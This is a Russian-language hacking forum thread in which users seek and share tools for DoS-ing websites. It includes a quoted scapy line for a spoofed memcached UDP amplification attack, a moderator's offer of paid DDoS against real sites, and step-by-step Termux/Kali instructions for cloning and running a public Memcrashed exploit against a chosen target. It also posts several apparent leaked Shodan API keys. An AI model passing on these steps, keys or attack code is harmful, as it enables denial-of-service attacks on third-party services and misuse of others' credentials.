Нужна программа для DOS`а

JAKEOLD

Местный
Статус
offline
Регистрация
16.07.2016
Сообщения
206
Репутация
89
Смотря какой иы сайт пвтаешься положить. Это более подходит для айпишников, там результат моментальный. Возможно на том сайте, который ты хочешь положить стоит маска
ага так и есть)
 

EnsoLZT

Участник
Статус
offline
Регистрация
14.11.2019
Сообщения
31
Репутация
28

Fake2020

Резидент
Статус
offline
Регистрация
11.02.2020
Сообщения
132
Репутация
120
Даже не читал что написали до меня)) но уверен на 90% что в паблике рабочего решения нет.... тем более если ты собрался досить конечно не чей то сайт визитку) а более менее серьезный ресурс... это реальная бизнес идея которая сегодня отлично монетизируется и никто ее так просто не будет сливать...
 

inonameuser

Резидент
Статус
offline
Регистрация
10.12.2019
Сообщения
198
Репутация
167
Даже не читал что написали до меня)) но уверен на 90% что в паблике рабочего решения нет.... тем более если ты собрался досить конечно не чей то сайт визитку) а более менее серьезный ресурс... это реальная бизнес идея которая сегодня отлично монетизируется и никто ее так просто не будет сливать...
а кто-то писал, что это способы, как убить фейсбук? нет, это скорее развлекаловка, как снести интернет своему другу
 

xam111

Главный модератор
Модератор
Статус
offline
Регистрация
02.02.2020
Сообщения
3,132
Репутация
2,679
Даже не читал что написали до меня)) но уверен на 90% что в паблике рабочего решения нет.... тем более если ты собрался досить конечно не чей то сайт визитку) а более менее серьезный ресурс... это реальная бизнес идея которая сегодня отлично монетизируется и никто ее так просто не будет сливать...
ваши бабки наш концерт и реальные сайти если надо умертвить можно если что
вопрос количество бюджета ?
 

Fake2020

Резидент
Статус
offline
Регистрация
11.02.2020
Сообщения
132
Репутация
120
а кто-то писал, что это способы, как убить фейсбук? нет, это скорее развлекаловка, как снести интернет своему другу
Еще раз!) Интернет ты своему другу скриптом выше не снесешь! А максимум можно подгрузить лишний раз какой то простой сайтик где админ за последние 2 года так и не додумался заблокировать весь трафик с порта 11211

Скрипт ссылку на который кидали выше использует фрейморк scapy для формирования таких 'дерьмо пакетов' как раз ими он и долбит уязвимые сервера(которые он получил с шодана) А ТЕ уже в свою очередь зеркалят трафик на жертву.. естественно жертва должна отвечать на все пакеты(и самое главное что отвечать должна большим количеством) . ниже вот сам запрос из данного скрипта...

Код:
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
 

SBosko

Местный
Статус
offline
Регистрация
23.02.2020
Сообщения
110
Репутация
94
Еще раз!) Интернет ты своему другу скриптом выше не снесешь! А максимум можно подгрузить лишний раз какой то простой сайтик где админ за последние 2 года так и не додумался заблокировать весь трафик с порта 11211

Скрипт ссылку на который кидали выше использует фрейморк scapy для формирования таких 'дерьмо пакетов' как раз ими он и долбит уязвимые сервера(которые он получил с шодана) А ТЕ уже в свою очередь зеркалят трафик на жертву.. естественно жертва должна отвечать на все пакеты(и самое главное что отвечать должна большим количеством) . ниже вот сам запрос из данного скрипта...

Код:
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
результат.png
 

Fake2020

Резидент
Статус
offline
Регистрация
11.02.2020
Сообщения
132
Репутация
120

inonameuser

Резидент
Статус
offline
Регистрация
10.12.2019
Сообщения
198
Репутация
167
Еще раз!) Интернет ты своему другу скриптом выше не снесешь! А максимум можно подгрузить лишний раз какой то простой сайтик где админ за последние 2 года так и не додумался заблокировать весь трафик с порта 11211

Скрипт ссылку на который кидали выше использует фрейморк scapy для формирования таких 'дерьмо пакетов' как раз ими он и долбит уязвимые сервера(которые он получил с шодана) А ТЕ уже в свою очередь зеркалят трафик на жертву.. естественно жертва должна отвечать на все пакеты(и самое главное что отвечать должна большим количеством) . ниже вот сам запрос из данного скрипта...

Код:
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
Так я и не про скрипт на термукс тебе, а про сайты, которые тут скинули )
 

SBosko

Местный
Статус
offline
Регистрация
23.02.2020
Сообщения
110
Репутация
94
Поздравляю) но я так подозреваю что это учебный портал у которого VDS за 2$ в месяц, который даже при обычном бруте временами уже может уходить в даун..
Ну я и не пытался нормальные сайты ложить не такой уж оптимист.
Так же можно ведь Zoom положить (Приглашение в конфу)
 

Ilyapro

Резидент
Статус
offline
Регистрация
01.01.2019
Сообщения
336
Репутация
248
⁣Telegram
Спасибо всем, за годную инфу.
 

shapes5698

Местный
Статус
offline
Регистрация
09.03.2018
Сообщения
127
Репутация
57
жесть годно



Первый вариант:TERMUX (ANDROID)
Обновляем pkg
pkg update
и пишем код
Python:

apt-get install python3
pip install scapy
pip install shodan
теперь скачаем сам скрипт
Python:

git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
Python:


готово, теперь пишем
Python:

ls
cd Memcrashed-DDoS-Exploit
ls
python3 Memcrashed.py

1.png


И так, нас попросит ввести SHODAN API KEY, но он стоит 50 баксов?
SHODAN key
берем ниже

61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
i3t9YPT0YQwBHFTRC5L88A1HzqQImb3l
oykKBEq2KRySU33OxizNkOir5PgHpMLv
v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik

Далее будет вопрос, *use api key? *
пишем Y
вводим мой апи кей
потом опять Y
снова Y
И вводим СВОЙ АЙПИ/САЙТ для проверки устойчивости
Готово, будет производится посыл пакетов, и если ваш сайт выдержал, то ему ничего не почем
2.png


Если говорить про кали линукс, то там абсолютно тоже самое, что сверху
но надо установить вот эти команды
sudo apt-get install python3-pip
pip3 install scapy
pip3 install shodan
я